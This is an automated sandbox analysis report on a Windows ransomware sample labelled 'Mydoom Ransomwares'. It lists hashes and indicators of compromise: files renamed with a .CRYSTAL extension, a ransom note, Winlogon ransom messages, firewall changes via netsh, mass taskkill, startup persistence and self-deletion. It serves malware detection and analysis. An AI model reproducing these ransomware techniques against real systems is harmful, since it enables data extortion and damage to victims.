Overview
overview
10Static
static
1000b9b6cf27...f7.exe
windows7-x64
305500734fe...81.exe
windows7-x64
0b75e2fadf...c5.exe
windows7-x64
80d5fa75218...64.exe
windows7-x64
101760c5727e...9c.exe
windows7-x64
101fe99fb7c5...81.exe
windows7-x64
102336173567...98.exe
windows7-x64
102522b83852...03.exe
windows7-x64
102af6bc16f2...b2.exe
windows7-x64
103d9f9c162e...64.exe
windows7-x64
83db846a796...e5.exe
windows7-x64
10493813116f...dc.exe
windows7-x64
104d61a61265...08.exe
windows7-x64
10510827ce68...c5.exe
windows7-x64
105642f8bd3b...2a.exe
windows7-x64
106c37d14d5a...4c.exe
windows7-x64
106c3c9af653...c3.exe
windows7-x64
1077186e57b2...20.exe
windows7-x64
107bca70a81c...61.exe
windows7-x64
108e934dcd46...88.exe
windows7-x64
109a75c8e353...60.exe
windows7-x64
109e067453f0...f3.exe
windows7-x64
10Mydoom Ran...06.exe
windows7-x64
10Mydoom Ran...5c.exe
windows7-x64
10Mydoom Ran...fc.exe
windows7-x64
10Mydoom Ran...59.exe
windows7-x64
10Mydoom Ran...64.exe
windows7-x64
10Mydoom Ran...76.exe
windows7-x64
10a9a89ed0d1...0f.exe
windows7-x64
10b4ab8f5c8b...95.exe
windows7-x64
10c034313090...ef.exe
windows7-x64
8c45a330cf8...24.exe
windows7-x64
10Resubmissions
21-08-2024 19:30
240821-x76q3sweqg 1021-08-2024 17:42
240821-v92h2avgpj 1012-06-2024 16:01
240612-tgps4a1bqh 10Analysis
-
max time kernel
1561s -
max time network
1563s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
21-08-2024 17:42
Behavioral task
behavioral1
Sample
00b9b6cf27deeda8de99d1719ef724808afa92080026df8dd17159be8ea420f7.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
05500734fe07ac2b5bc89aa12b090203c4b74851cb0d62bd388f27ec6d6caa81.exe
Resource
win7-20240708-en
Behavioral task
behavioral3
Sample
0b75e2fadffc45dff940e58f5b6f8d99832426bb880f432f98d853308b29c9c5.exe
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
0d5fa75218e5eb97fccbcf36d3bbd9cd77247260977f69c50deb29399ee0e464.exe
Resource
win7-20240704-en
Behavioral task
behavioral5
Sample
1760c5727e5568d3b18a1cbf0d50c311613699af8233c96fb3eee197f438ce9c.exe
Resource
win7-20240708-en
Behavioral task
behavioral6
Sample
1fe99fb7c527a90826896e695f23e712375358df3c7aa9163af6b96d872a9f81.exe
Resource
win7-20240705-en
Behavioral task
behavioral7
Sample
23361735678f37d77510b22306c727a987f84c87143bb0062f3d76413c36fc98.exe
Resource
win7-20240704-en
Behavioral task
behavioral8
Sample
2522b83852588bc0f7f620f9b4fe3a9337b9608be335d3958d190275f333df03.exe
Resource
win7-20240704-en
Behavioral task
behavioral9
Sample
2af6bc16f25822d6d2f1429bc15f3d47f6c0bcb026ba387249d173fc753919b2.exe
Resource
win7-20240708-en
Behavioral task
behavioral10
Sample
3d9f9c162e130c197301adb5a4e141f2e1ae8a19c85b457c429e8410a5c91464.exe
Resource
win7-20240705-en
Behavioral task
behavioral11
Sample
3db846a796caa001666df8f7cae709fff02f984711b0e70e0e79c457d631b4e5.exe
Resource
win7-20240708-en
Behavioral task
behavioral12
Sample
493813116f32ad6f455676cd54e32a2167ece845038202614cbb49e126f5afdc.exe
Resource
win7-20240708-en
Behavioral task
behavioral13
Sample
4d61a61265cdd942cff973609170529eaf19579b5d17e64deccbd6f6f1fdfa08.exe
Resource
win7-20240704-en
Behavioral task
behavioral14
Sample
510827ce687ad00545a1726c25a00f65e7d685b7dcd857fc6f11a0392feee5c5.exe
Resource
win7-20240705-en
Behavioral task
behavioral15
Sample
5642f8bd3bc151349ded1a3c160c037c26194c9da2b7ace5d8ca11cddb57612a.exe
Resource
win7-20240704-en
Behavioral task
behavioral16
Sample
6c37d14d5ad674e4c0fa8df0a999be6b27399936c9ff16f7fb30b802addb7b4c.exe
Resource
win7-20240705-en
Behavioral task
behavioral17
Sample
6c3c9af653a28977257ce971ed701b1b893cdf67d5c57baa44a9d76c28675dc3.exe
Resource
win7-20240704-en
Behavioral task
behavioral18
Sample
77186e57b2eeb3ed4b56cfe280d5eeea3155d9502217cda824600bc93d365320.exe
Resource
win7-20240704-en
Behavioral task
behavioral19
Sample
7bca70a81cc9e1067e99e313802a4cc095f79bbc3a1aa86b7b3b9eabf3748e61.exe
Resource
win7-20240729-en
Behavioral task
behavioral20
Sample
8e934dcd46eb57d42712d097deab6ce00ef1ce2db87d03f8d3d8e8c10da7e088.exe
Resource
win7-20240704-en
Behavioral task
behavioral21
Sample
9a75c8e353df060ec927ada5990402b57764275f2a860d9cf500a661ec3de060.exe
Resource
win7-20240708-en
Behavioral task
behavioral22
Sample
9e067453f09c5cbfa4c5a74fe3e70d7d8e66a25057e6c35240dce5a40ec31bf3.exe
Resource
win7-20240708-en
Behavioral task
behavioral23
Sample
Mydoom Ransomwares/1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
Resource
win7-20240729-en
Behavioral task
behavioral24
Sample
Mydoom Ransomwares/1fb613ee3b0e7f96f5dea029aae31b86340b0724e88f84a76b386af84d1cf95c.exe
Resource
win7-20240704-en
Behavioral task
behavioral25
Sample
Mydoom Ransomwares/5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe
Resource
win7-20240704-en
Behavioral task
behavioral26
Sample
Mydoom Ransomwares/84ee7e5c055fd25204ca4969940292b03da9d45b5048cbb7f7ba8528b88a2859.exe
Resource
win7-20240704-en
Behavioral task
behavioral27
Sample
Mydoom Ransomwares/cc3b570fa8f87354f06a20d8873c45087684c217f1b434b3b0048acd96fe3e64.exe
Resource
win7-20240705-en
Behavioral task
behavioral28
Sample
Mydoom Ransomwares/dd286a4d79d0f4c2b906073c7f46680252ca09c1c39b0dc12c92097c56662876.exe
Resource
win7-20240708-en
Behavioral task
behavioral29
Sample
a9a89ed0d139fbc436794f5d3a8e58c547247039d8c86767b1e2f2bce40e390f.exe
Resource
win7-20240708-en
Behavioral task
behavioral30
Sample
b4ab8f5c8b97307b328ba30fdefdbe4341c4e2c576729fdb5c7329d5b07bb695.exe
Resource
win7-20240708-en
Behavioral task
behavioral31
Sample
c03431309015563257e5e118656d07ce136f151339054b9f66894ecf9dde9aef.exe
Resource
win7-20240708-en
General
-
Target
Mydoom Ransomwares/5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe
-
Size
100KB
-
MD5
7fdd3bf8886199e8336f95c88bcaa49a
-
SHA1
77e2019093379de4d5de07dbcf5893831c9bb7ec
-
SHA256
5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc
-
SHA512
9d774eca21fb33f26991cf20f0f6a2f0bce56aa4cc3d17fd769e0bb767ca400cd5c8dd64bb62db23bf5bc112b91b1a26db7bf2f9d85993cb990be5113e527a40
-
SSDEEP
1536:1zmSA404oATJVPHEMXMxa6CO3/k/hdXVyczH+95DfFFjfuEnm:1zxEYsZaLhdlo95DfFFjfuCm
Malware Config
Extracted
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
Signatures
-
Renames multiple (242) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Modifies Windows Firewall 2 TTPs 4 IoCs
pid Process 2344 netsh.exe 2652 netsh.exe 2152 netsh.exe 2536 netsh.exe -
Deletes itself 1 IoCs
pid Process 1580 cmd.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe -
Modifies file permissions 1 TTPs 3 IoCs
pid Process 2484 icacls.exe 2912 icacls.exe 972 icacls.exe -
Modifies WinLogon 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "All your files have been encrypted" 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = " If you want to restore them, write us to the e-mail [email protected]\r\nor\r\[email protected]" 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe -
pid Process 2144 arp.exe -
Drops file in Program Files directory 12 IoCs
description ioc Process File opened for modification C:\Program Files\ImportConnect.gif.[ID-80F7800A].[[email protected]].CRYSTAL 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe File opened for modification C:\Program Files\InstallRepair.lock.[ID-80F7800A].[[email protected]].CRYSTAL 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe File opened for modification C:\Program Files\MergeResume.pcx.[ID-80F7800A].[[email protected]].CRYSTAL 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe File opened for modification C:\Program Files\ResumeConfirm.bmp.[ID-80F7800A].[[email protected]].CRYSTAL 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe File opened for modification C:\Program Files\UnregisterGrant.svgz.[ID-80F7800A].[[email protected]].CRYSTAL 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe File opened for modification C:\Program Files\UnlockEnter.docx.[ID-80F7800A].[[email protected]].CRYSTAL 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe File opened for modification C:\Program Files\UpdateDisable.wax.[ID-80F7800A].[[email protected]].CRYSTAL 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe File opened for modification C:\Program Files\CompareRestart.reg.[ID-80F7800A].[[email protected]].CRYSTAL 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe File opened for modification C:\Program Files\InitializeSubmit.ico.[ID-80F7800A].[[email protected]].CRYSTAL 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe File opened for modification C:\Program Files\RegisterWait.emf.[ID-80F7800A].[[email protected]].CRYSTAL 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe File opened for modification C:\Program Files\UninstallResume.m1v.[ID-80F7800A].[[email protected]].CRYSTAL 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe File opened for modification C:\Program Files\UnlockCompare.pot.[ID-80F7800A].[[email protected]].CRYSTAL 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe -
Drops file in Windows directory 14 IoCs
description ioc Process File opened for modification C:\Windows\Starter.xml.[ID-80F7800A].[[email protected]].CRYSTAL 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe File opened for modification C:\Windows\TSSysprep.log.[ID-80F7800A].[[email protected]].CRYSTAL 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe File opened for modification C:\Windows\Ultimate.xml.[ID-80F7800A].[[email protected]].CRYSTAL 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe File opened for modification C:\Windows\WindowsShell.Manifest 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe File opened for modification C:\Windows\msdfmap.ini.[ID-80F7800A].[[email protected]].CRYSTAL 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe File opened for modification C:\Windows\setupact.log.[ID-80F7800A].[[email protected]].CRYSTAL 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe File created C:\Windows\RESTORE_FILES_INFO.txt 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe File created C:\Windows\bootstat.dat.[ID-80F7800A].[[email protected]].CRYSTAL 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe File opened for modification C:\Windows\PFRO.log.[ID-80F7800A].[[email protected]].CRYSTAL 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe File opened for modification C:\Windows\system.ini.[ID-80F7800A].[[email protected]].CRYSTAL 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe File created C:\Windows\WindowsShell.Manifest.[ID-80F7800A].[[email protected]].CRYSTAL 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe File opened for modification C:\Windows\DtcInstall.log.[ID-80F7800A].[[email protected]].CRYSTAL 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe File opened for modification C:\Windows\win.ini.[ID-80F7800A].[[email protected]].CRYSTAL 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe File opened for modification C:\Windows\WindowsUpdate.log.[ID-80F7800A].[[email protected]].CRYSTAL 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 356 sc.exe 3024 sc.exe 2796 sc.exe 1448 sc.exe 2884 sc.exe 2544 sc.exe 2552 sc.exe 2584 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1240 PING.EXE 3060 cmd.exe -
Kills process with taskkill 48 IoCs
pid Process 1840 taskkill.exe 396 taskkill.exe 2228 taskkill.exe 772 taskkill.exe 1008 taskkill.exe 2348 taskkill.exe 2928 taskkill.exe 2964 taskkill.exe 2972 taskkill.exe 2032 taskkill.exe 2576 taskkill.exe 2804 taskkill.exe 2796 taskkill.exe 328 taskkill.exe 1384 taskkill.exe 1224 taskkill.exe 2496 taskkill.exe 2464 taskkill.exe 2508 taskkill.exe 1552 taskkill.exe 1776 taskkill.exe 448 taskkill.exe 1832 taskkill.exe 880 taskkill.exe 2232 taskkill.exe 1428 taskkill.exe 1496 taskkill.exe 2140 taskkill.exe 2868 taskkill.exe 2512 taskkill.exe 2020 taskkill.exe 2168 taskkill.exe 1556 taskkill.exe 3068 taskkill.exe 1056 taskkill.exe 2412 taskkill.exe 1532 taskkill.exe 2608 taskkill.exe 2192 taskkill.exe 1480 taskkill.exe 2784 taskkill.exe 2204 taskkill.exe 684 taskkill.exe 1632 taskkill.exe 1656 taskkill.exe 580 taskkill.exe 556 taskkill.exe 2736 taskkill.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2760 reg.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 604 notepad.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1240 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
description pid Process Token: SeDebugPrivilege 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe Token: SeDebugPrivilege 2784 taskkill.exe Token: SeDebugPrivilege 1496 taskkill.exe Token: SeDebugPrivilege 1556 taskkill.exe Token: SeDebugPrivilege 1384 taskkill.exe Token: SeDebugPrivilege 396 taskkill.exe Token: SeDebugPrivilege 580 taskkill.exe Token: SeDebugPrivilege 1224 taskkill.exe Token: SeDebugPrivilege 2964 taskkill.exe Token: SeDebugPrivilege 2228 taskkill.exe Token: SeDebugPrivilege 2204 taskkill.exe Token: SeDebugPrivilege 2972 taskkill.exe Token: SeDebugPrivilege 448 taskkill.exe Token: SeDebugPrivilege 1832 taskkill.exe Token: SeDebugPrivilege 684 taskkill.exe Token: SeDebugPrivilege 880 taskkill.exe Token: SeDebugPrivilege 556 taskkill.exe Token: SeDebugPrivilege 772 taskkill.exe Token: SeDebugPrivilege 1532 taskkill.exe Token: SeDebugPrivilege 2140 taskkill.exe Token: SeDebugPrivilege 3068 taskkill.exe Token: SeDebugPrivilege 1840 taskkill.exe Token: SeDebugPrivilege 2496 taskkill.exe Token: SeDebugPrivilege 2464 taskkill.exe Token: SeDebugPrivilege 2736 taskkill.exe Token: SeDebugPrivilege 2508 taskkill.exe Token: SeDebugPrivilege 2608 taskkill.exe Token: SeDebugPrivilege 2576 taskkill.exe Token: SeDebugPrivilege 2192 taskkill.exe Token: SeDebugPrivilege 2804 taskkill.exe Token: SeDebugPrivilege 2868 taskkill.exe Token: SeDebugPrivilege 2796 taskkill.exe Token: SeDebugPrivilege 2032 taskkill.exe Token: SeDebugPrivilege 1056 taskkill.exe Token: SeDebugPrivilege 1656 taskkill.exe Token: SeDebugPrivilege 1552 taskkill.exe Token: SeDebugPrivilege 1008 taskkill.exe Token: SeDebugPrivilege 2512 taskkill.exe Token: SeDebugPrivilege 2348 taskkill.exe Token: SeDebugPrivilege 2928 taskkill.exe Token: SeDebugPrivilege 2232 taskkill.exe Token: SeDebugPrivilege 328 taskkill.exe Token: SeDebugPrivilege 2020 taskkill.exe Token: SeDebugPrivilege 2168 taskkill.exe Token: SeDebugPrivilege 1776 taskkill.exe Token: SeDebugPrivilege 1480 taskkill.exe Token: SeDebugPrivilege 1632 taskkill.exe Token: SeDebugPrivilege 1428 taskkill.exe Token: SeDebugPrivilege 2408 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2060 wrote to memory of 2784 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 31 PID 2060 wrote to memory of 2784 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 31 PID 2060 wrote to memory of 2784 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 31 PID 2060 wrote to memory of 2368 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 33 PID 2060 wrote to memory of 2368 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 33 PID 2060 wrote to memory of 2368 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 33 PID 2060 wrote to memory of 2760 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 35 PID 2060 wrote to memory of 2760 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 35 PID 2060 wrote to memory of 2760 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 35 PID 2060 wrote to memory of 2668 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 37 PID 2060 wrote to memory of 2668 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 37 PID 2060 wrote to memory of 2668 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 37 PID 2060 wrote to memory of 2536 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 39 PID 2060 wrote to memory of 2536 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 39 PID 2060 wrote to memory of 2536 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 39 PID 2060 wrote to memory of 2544 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 40 PID 2060 wrote to memory of 2544 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 40 PID 2060 wrote to memory of 2544 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 40 PID 2060 wrote to memory of 2552 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 41 PID 2060 wrote to memory of 2552 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 41 PID 2060 wrote to memory of 2552 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 41 PID 2060 wrote to memory of 2584 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 42 PID 2060 wrote to memory of 2584 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 42 PID 2060 wrote to memory of 2584 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 42 PID 2060 wrote to memory of 356 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 